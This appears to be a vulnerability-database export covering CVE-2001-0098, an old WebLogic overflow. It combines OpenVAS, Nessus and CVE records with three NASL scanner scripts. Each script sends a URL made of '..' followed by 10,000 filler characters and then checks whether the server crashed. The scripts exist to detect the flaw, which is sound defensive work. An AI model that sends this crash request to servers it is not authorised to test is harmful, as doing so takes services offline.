{"id": "OPENVAS:136141256231010697", "type": "openvas", "bulletinFamily": "scanner", "title": "WebLogic Server DoS", "description": "Requesting an overly long URL starting with a double dot\n can crash certain versions of WebLogic servers.", "published": "2005-11-03T00:00:00", "modified": "2020-04-24T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010697", "reporter": "Copyright (C) 2001 StrongHoldNet", "references": [], "cvelist": ["CVE-2001-0098"], "lastseen": "2020-04-29T19:47:15", "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2001-0098"]}, {"type": "nessus", "idList": ["1454.PRM", "WEBLOGIC_DOTDOTDOS.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:10697"]}], "rev": 4}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2001-0098"]}, {"type": "nessus", "idList": ["WEBLOGIC_DOTDOTDOS.NASL"]}]}, "exploitation": null, "vulnersScore": -0.3}, "pluginID": "136141256231010697", "sourceData": "# OpenVAS Vulnerability Test\n# Description: WebLogic Server DoS\n#\n# Authors:\n# Vincent Renardias <vincent@strongholdnet.com>\n#\n# Copyright:\n# Copyright (C) 2001 StrongHoldNet\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nCPE = \"cpe:/a:oracle:weblogic_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10697\");\n script_version(\"2020-04-24T10:02:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-24 10:02:39 +0000 (Fri, 24 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2138);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2001-0098\");\n\n script_name(\"WebLogic Server DoS\");\n\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2001 StrongHoldNet\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n script_tag(name:\"solution\", value:\"Upgrade to at least WebLogic 5.1 with Service Pack 7\");\n\n script_tag(name:\"summary\", value:\"Requesting an overly long URL starting with a double dot\n can crash certain version of WebLogic servers.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\n\nif(!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif(!get_app_location(cpe: CPE, port: port, nofork: TRUE))\n exit(0);\n\nif(http_is_dead(port:port))\n exit(0);\n\nsoc = http_open_socket(port);\nif(!soc)\n exit(0);\n\nreq = http_get(item:string(\"..\", crap(10000)), port:port);\nsend(socket:soc, data:req);\nhttp_recv(socket:soc);\nhttp_close_socket(soc);\n\nif(http_is_dead(port:port)) {\n security_message(port:port);\n 
exit(0);\n}\n\nexit(99);\n", "naslFamily": "Denial of Service", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646579253, "score": 1659797217}, "_internal": {"score_hash": "7d0306431c6b51aaa15cab5096a6250a"}}
{"nessus": [{"lastseen": "2023-01-11T14:17:20", "description": "Requesting an overly long URL starting with a double dot can crash certain versions of WebLogic servers or possibly even allow for arbitrary code execution.", "cvss3": {}, "published": "2001-06-21T00:00:00", "type": "nessus", "title": "WebLogic Server Double Dot GET Request Remote Overflow", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0098"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_DOTDOTDOS.NASL", "href": "https://www.tenable.com/plugins/nessus/10697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# This script was written by Vincent Renardias <vincent@strongholdnet.com>\n#\n# Licence : GPL v2\n#\n\n# Changes by Tenable:\n# - Revised plugin title (4/13/2009)\n# - Added cpe, updated copyright (8/15/2012)\n# - Switched to the weblogic detect script, updated copyright (11/23/2015)\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(10697);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2001-0098\");\n script_bugtraq_id(2138);\n\n script_name(english:\"WebLogic Server Double Dot GET Request Remote Overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is vulnerable to a buffer overflow attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"Requesting an overly long URL starting with a 
double dot can crash\ncertain versions of WebLogic servers or possibly even allow for\narbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2000/Dec/382\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to WebLogic 5.1 with Service Pack 7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2000/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2001/06/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DENIAL);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2001-2022 StrongHoldNet\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"http_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:80, embedded:TRUE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\nbanner = get_http_banner(port:port);\nif (!banner || \"WebLogic\" >!< banner) exit(0);\n\nif(get_port_state(port))\n{\n if(http_is_dead(port:port))exit(0);\n soc = http_open_socket(port);\n if(soc)\n {\n buffer = http_get(item:string(\"..\", crap(10000)), port:port);\n send(socket:soc, data:buffer);\n r = http_recv(socket:soc);\n http_close_socket(soc);\n \n 
if(http_is_dead(port:port, retry: 2))security_hole(port);\n }\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:21:18", "description": "The remote WebLogic server can be disabled remotely by requesting a long URL starting with a double dot. ", "cvss3": {}, "published": "2004-08-20T00:00:00", "type": "nessus", "title": "WebLogic Server < 5.1 SP 7 \"..\" URL Handling Remote Overflow DoS", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0098"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:bea:weblogic_server:*:*:*:*:*:*:*:*"], "id": "1454.PRM", "href": "https://www.tenable.com/plugins/nnm/1454", "sourceData": "Binary data 1454.prm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:21:33", "description": "Buffer overflow in Bea WebLogic Server before 5.1.0 allows remote attackers to execute arbitrary commands via a long URL that begins with a \"..\" string.", "cvss3": {}, "published": "2001-02-12T05:00:00", "type": "cve", "title": "CVE-2001-0098", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0098"], "modified": "2017-12-19T02:29:00", "cpe": ["cpe:/a:bea:weblogic_server:4.5.2"], "id": "CVE-2001-0098", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0098", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:bea:weblogic_server:4.5.2:sp2:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-08T11:44:13", "description": "Requesting an overly long URL starting with a double dot\ncan crash certain versions of WebLogic servers.", "cvss3": {}, "published": "2005-11-03T00:00:00", "type": "openvas", "title": "WebLogic Server DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2001-0098"], "modified": "2017-12-07T00:00:00", "id": "OPENVAS:10697", "href": "http://plugins.openvas.org/nasl.php?oid=10697", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: weblogic_dotdotdos.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: WebLogic Server DoS\n#\n# Authors:\n# Vincent Renardias <vincent@strongholdnet.com>\n#\n# Copyright:\n# Copyright (C) 2001 StrongHoldNet\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"Requesting an overly long URL starting with a double dot\ncan crash certain version of WebLogic servers.\";\n\ntag_solution = \"upgrade to at least WebLogic 5.1 with Service Pack 7\";\n\nif(description)\n{\n script_id(10697);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2138);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2001-0098\");\n name = \"WebLogic Server DoS\";\n \n script_name(name);\n \n\n \n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n \n \n script_copyright(\"This script is Copyright (C) 2001 StrongHoldNet\");\n family = \"Remote file access\";\n script_family(family);\n script_dependencies(\"find_service.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\n\nif(get_port_state(port))\n{\n if(http_is_dead(port:port))exit(0);\n soc = http_open_socket(port);\n if(soc)\n {\n buffer = http_get(item:string(\"..\", crap(10000)), port:port);\n send(socket:soc, data:buffer);\n r = http_recv(socket:soc);\n http_close_socket(soc);\n \n if(http_is_dead(port:port))security_message(port);\n }\n}\n\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}